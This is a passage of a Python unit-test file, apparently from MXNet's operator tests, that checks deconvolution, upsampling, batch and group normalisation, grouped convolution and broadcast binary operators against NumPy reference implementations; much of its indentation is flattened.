check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
@with_seed()
def test_deconvolution_forward_with_bias():
"""Check if deconvolution forward can work well with bias=True
"""
def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe = y.simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
exe.forward(is_train=False)
o = exe.outputs[0]
t = o.asnumpy()
check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
    arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in enumerate(shapes)}
    arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in enumerate(shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
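    # arg_k is upsampled by a factor of root_scale * scale**k per spatial dim, so
    # with the outputs fed back as out-grads each input element accumulates
    # (root_scale * scale**k)**2 copies of itself, which is the factor checked below.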
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
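        # Standard bilinear-interpolation kernel (the FCN-style upsampling
        # initializer): weights peak at the kernel centre c and fall off
        # linearly with distance in x and y.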
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
@with_seed()
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
@with_seed()
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
# bilinear upsampling takes only 1 data and 1 weight
# multi input mode is not applicable
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
@with_seed()
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
            s = (shape[1],)
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@with_seed()
def test_batchnorm():
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(op, shape, axis, cudnn_off, output_mean_var):
print(str((op, shape, axis, cudnn_off)))
kwargs = dict(output_mean_var=output_mean_var)
if op == mx.nd.contrib.SyncBatchNorm:
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad()
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad()
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
for _ in range(num_iters):
data = mx.nd.random.uniform(shape=shape)
data.attach_grad()
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=False, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
running_var = running_var * momentum + \
data_var_flat * (1 - momentum)
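            # Hand-derived batch-norm backward, chain rule through
            # x_hat = (x - mu) / sqrt(var + eps):
            #   dvar   = sum(dL/dx_hat * (x - mu)) * -1/2 * (var + eps)^(-3/2)
            #   dmu    = -sum(dL/dx_hat) / sqrt(var + eps) - 2 * dvar * mean(x - mu)
            #   dx     = dL/dx_hat / sqrt(var + eps) + 2 * dvar * (x - mu) / m + dmu / m
            #   dgamma = sum(dL/dy * x_hat), dbeta = sum(dL/dy)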
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
m = np.prod(shape) / shape[axis]
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
atol = 1e-2
rtol = 1e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(data.grad.asnumpy(),
dX.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_gamma.grad.asnumpy(), dW.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_beta.grad.asnumpy(), db.asnumpy(), atol=atol, rtol=rtol)
for op in [mx.nd.BatchNorm, mx.nd.contrib.SyncBatchNorm]:
for shape in [(24, 2), (24, 3, 4), (24, 4, 4, 4), (24, 8, 4, 4), (24, 5, 6, 4, 4)]:
for axis in range(len(shape)):
for cudnn_off in [False, True]:
for output_mean_var in [False, True]:
_test_batchnorm_impl(op, shape, axis,
cudnn_off, output_mean_var)
@with_seed()
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
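    # Reference forward: reshape (N, C, H, W) to (N, G, C/G, H, W), normalize each
    # (n, g) slice over its last three axes, then apply the per-group affine:
    #   y = x_hat * gamma_g + beta_g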
def np_groupnorm(data, gamma, beta, num_groups, eps):
new_param_shape = (1, num_groups, 1, 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
        return out.reshape(data.shape), mean, std
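    # Reference backward: with x_hat = (x - mean) / std and g = dL/dy,
    #   dbeta  = sum(g) and dgamma = sum(g * x_hat) over all non-group axes,
    #   dx     = gamma / std * (g - mean(g) - x_hat * mean(g * x_hat)) per group.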
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, num_groups, 1, 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
beta_grad = np.sum(ograd, axis=(0, 2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype)
gamma_grad = np.sum(x_hat * ograd, axis=(0, 2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype)
x_hat_grad = ograd * gamma
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_groups,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-5, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-5, dtype=dtype)
@with_seed()
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1.simple_bind(default_context(), x=shape)
exe2 = y2.simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@unittest.skip("Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
@with_seed()
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1.simple_bind(dev, x=shape)
exe2 = y2.simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@with_seed()
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
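    # grad_req semantics: 'null' skips the gradient entirely, 'write' overwrites
    # the buffer, 'add' accumulates into it. Mixing requests across variables
    # must not change the computed gradient values.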
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv.bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv.bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
        # Generate random data with ndim between 1 and 5 and all shape dims between 1 and 5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
    d = gen_broadcast_data(idx)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
    d = gen_binary_data(dummy)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
            logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
            logging.error('input b hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
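        # The analytic gradient of a broadcast op must be reduced back to each
        # input's shape: sum over every axis that was expanded (size 1 in the
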